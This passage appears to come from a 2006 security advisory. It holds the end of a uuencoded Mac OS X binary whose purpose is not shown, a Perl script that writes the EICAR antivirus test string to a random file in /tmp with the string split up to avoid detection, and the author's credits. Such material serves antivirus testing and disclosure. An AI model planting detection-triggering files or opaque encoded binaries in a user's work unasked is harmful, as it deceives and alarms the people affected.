M<F%M95]I;F9O`%]S=&%R=#I&*#`L,2D]*#`L,2D`=F]I9#IT*#`L,2D`87)G
M8SI0*#`L,BD]<B@P+#(I.RTR,30W-#@S-C0X.S(Q-#<T.#,V-#<[`&%R9W8Z
M4"@P+#,I/2HH,"PT*3TJ*#`L-2D]<B@P+#4I.S`[,3(W.P!E;G9P.E`H,"PS
M*0!I;G0Z="@P+#(I`&-H87(Z="@P+#4I`&DZ<B@P+#(I`'`Z<B@P+#0I`'$Z
M<B@P+#,I`'1E<FTZ*#`L-BD]*B@P+#<I/68H,"PQ*0````!?7V-A;&Q?;6]D
M7VEN:71?9G5N8W,`7V-A;&Q?;6]D7VEN:71?9G5N8W,Z9B@P+#$I`'`Z*#`L
M-BD`````3EA!<F=C.D<H,"PR*0!.6$%R9W8Z1R@P+#,I`&5N=FER;VXZ1R@P
M+#,I`%]?<')O9VYA;64Z1R@P+#0I`&UA8VA?:6YI=%]R;W5T:6YE.D<H,"PX
M*3TJ*#`L.2D]9B@P+#(I`%]C=&AR96%D7VEN:71?<F]U=&EN93I'*#`L."D`
M<&]I;G1E<E]T;U]O8FIC26YI=#I3*#`L-BD`<&]I;G1E<E]T;U]?9&%R=VEN
M7V=C8S-?<')E<F5G:7-T97)?9G)A;65?:6YF;SI3*#`L-BD``&1Y;&1?;&%Z
M>5]S>6UB;VQ?8FEN9&EN9U]E;G1R>5]P;VEN=`!E<G)O<E]M97-S86=E`&1Y
M;&1?9G5N8U]L;V]K=7!?<&]I;G1E<@!?9&%R=VEN7W5N=VEN9%]D>6QD7V%D
M9%]I;6%G95]H;V]K`%]D87)W:6Y?=6YW:6YD7V1Y;&1?<F5M;W9E7VEM86=E
67VAO;VL`7W)L+C``7VEM<&QA;G0`````
`
end

rand-eicar.pl
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
$test = rand($i);   # $i is never set in this script, so rand(0) acts like rand(1): a 0.xxx file name
open(OP,">/tmp/$test") or die "open /tmp/$test: $!";
# Uh... this isn't eicar dumb shit... I should not have to break this line up.
# print rather than printf: the string contains a '%', and '$' is escaped so it is
# written literally instead of being interpolated.
print OP "X5O!P" . "%@AP\[" . "4\PZX" . "54(P^)" . "7CC)7\}" . "\$EICAR" .
  "-STANDARD-ANTIVIRUS-TEST-FILE" . "!\$H+H*";
close(OP);
print(";p;P;p;p");


ADDITIONAL INFORMATION

The information has been provided by K F <kf_lists@digitalmunition.com>.
The original article can be found at:
http://www.digitalmunition.com/DMA[2006-1031a].txt


